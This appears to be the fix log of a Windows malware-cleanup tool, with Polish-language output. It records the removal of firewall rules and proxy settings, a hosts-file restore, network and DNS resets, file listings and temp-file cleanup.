"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{382BAA1D-2454-4607-AFF9-2013F9C517A5}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E4A66AE3-F9DD-442C-9DB4-1DC8450A9101}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9C72FBB1-9B02-4D58-B759-EB46EE0FA165}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{2EB3AE89-1765-4A40-8C2E-AC80BB26DD7E}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{05458F64-71B7-4D7B-B787-50DEF3E7DC17}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{66422008-3EAC-430D-A4F3-E8789E4EBFEA}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{528EC959-68F4-4299-B77A-51BD0FFAB752}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{D24C728C-7AF4-4667-9C60-4AE4BFFDC5BE}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{824589D8-984E-4791-9AA2-0AF6AB96114D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BC439E86-3C2D-487D-90CD-A8027DCD0163}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FA7E57DE-46E9-44CC-90A1-C12FD2953734}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B27242ED-E50E-4991-BEF1-5D36B6767A8A}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CCB36B66-169F-48AE-8335-FB65681580C3}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{B2F714ED-70E7-4302-9A1E-317DCD60FD3E}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EB151E14-9252-43D5-B5D7-95CB5A99BAE1}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{90358491-0F7E-4902-9E7A-387A36921D8B}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{BD26266C-9665-49F5-BB53-9A6D5F1440E1}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{15BBFBDA-FC59-4850-BE98-96D862905272}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{183568B8-EC84-4799-A0A0-6118469003BD}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{9C431AB2-41D6-4B90-AF9C-28373F77D83D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{F04F5A38-DC16-414D-B0AD-BD65FD675285}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{17146151-E038-482B-ABBF-1C65287CF97D}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{0C886FE7-BC52-4F4B-BF80-48350FF7DFC9}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{47A422BE-ADBB-49AD-A26C-F9F2785101BA}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{A3AD3CFA-F373-40E5-818A-DF60D217637B}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{45F871DF-A008-4433-8F52-589FA43D706C}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{CC4D3F11-73B5-46C4-AD72-AA8D5A30541B}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{408F5652-536C-47D8-A149-D9DEE0526756}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{C9334AA3-9765-4478-A9D6-8F714A7223DF}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{71E63A59-3089-4274-9D33-3AD38A2BD5B6}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{79F00C57-D74A-4787-9048-855974AD2632}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4AB41BFF-B4BB-470B-9E3C-1D67658152A6}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{E6ADA24F-2F38-4030-BBB1-5F90E4D39666}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4BEBC431-FB63-4CBF-A456-4ED8E79F2154}" => pomyślnie usunięto
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{4C098975-9938-4F0D-BB32-725DC1EA1DC4}" => pomyślnie usunięto
C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono
Hosts pomyślnie przywrócono.

========= RemoveProxy: =========

"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => pomyślnie usunięto
"HKU\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => pomyślnie usunięto
"HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\DefaultConnectionSettings" => pomyślnie usunięto
"HKU\S-1-5-21-2392927722-2977143306-2196907431-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\\SavedLegacySettings" => pomyślnie usunięto


========= Koniec  RemoveProxy: =========


========= netsh int ip reset =========

Resetting Compartment Forwarding, OK!
Resetting Compartment, OK!
Resetting Control Protocol, OK!
Resetting Echo Sequence Request, OK!
Resetting Global, OK!
Resetting Interface, OK!
Resetting Anycast Address, OK!
Resetting Multicast Address, OK!
Resetting Unicast Address, OK!
Resetting Neighbor, OK!
Resetting Path, OK!
Resetting Potential, OK!
Resetting Prefix Policy, OK!
Resetting Proxy Neighbor, OK!
Resetting Route, OK!
Resetting Site Prefix, OK!
Resetting Subinterface, OK!
Resetting Wakeup Pattern, OK!
Resetting Resolve Neighbor, OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , failed.
Odmowa dost©pu.

Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Resetting , OK!
Restart the computer to complete this action.


========= Koniec  CMD: =========


========= ipconfig /flushdns =========


Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= Koniec  CMD: =========


========================= FilesInDirectory: C:\Users\Admin\AppData\Local\*.exe;*.dll;*.ini ========================

2018-03-10 15:17 - 2018-03-10 15:17 - 000000002 ____A [23B58DEF11B45727D3351702515F86AF] () C:\Users\Admin\AppData\Local\WMI.ini

====== Koniec  Filesindirectory ======

========================= FilesInDirectory: C:\Users\Admin\*.exe;*.dll;*.ini ========================

2018-05-17 09:31 - 2018-05-17 09:31 - 000000020 ___SH [6FC234AD3752E1267B34FB12BCD6718B] () C:\Users\Admin\ntuser.ini
2019-01-13 20:51 - 2019-01-13 20:51 - 000000009 ____A [93E6B6D7762D03CD4FD26D97AEE2C58C] () C:\Users\Admin\rstr2.ini
2019-03-23 13:59 - 2019-03-23 13:59 - 000000009 ____A [97A8045A0361167E36E1EF06448E2FC8] () C:\Users\Admin\rstr4.ini

====== Koniec  Filesindirectory ======

=========== EmptyTemp: ==========

BITS transfer queue => 9461760 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 329834727 B
Java, Flash, Steam htmlcache => 1124 B
Windows/system/drivers => 208188791 B
Edge => 8704 B
Chrome => 0 B
Firefox => 0 B
Opera => 433403206 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Users => 0 B
ProgramData => 0 B
Public => 0 B
systemprofile => 6478086 B
systemprofile32 => 0 B
LocalService => 44020852 B
LocalService => 0 B
NetworkService => 0 B
NetworkService => 0 B
Admin => 274500193 B

RecycleBin => 0 B
EmptyTemp: => 1.2 GB danych tymczasowych Usunięto.

================================


System wymagał restartu.

==== Koniec  Fixlog 11:10:18 ====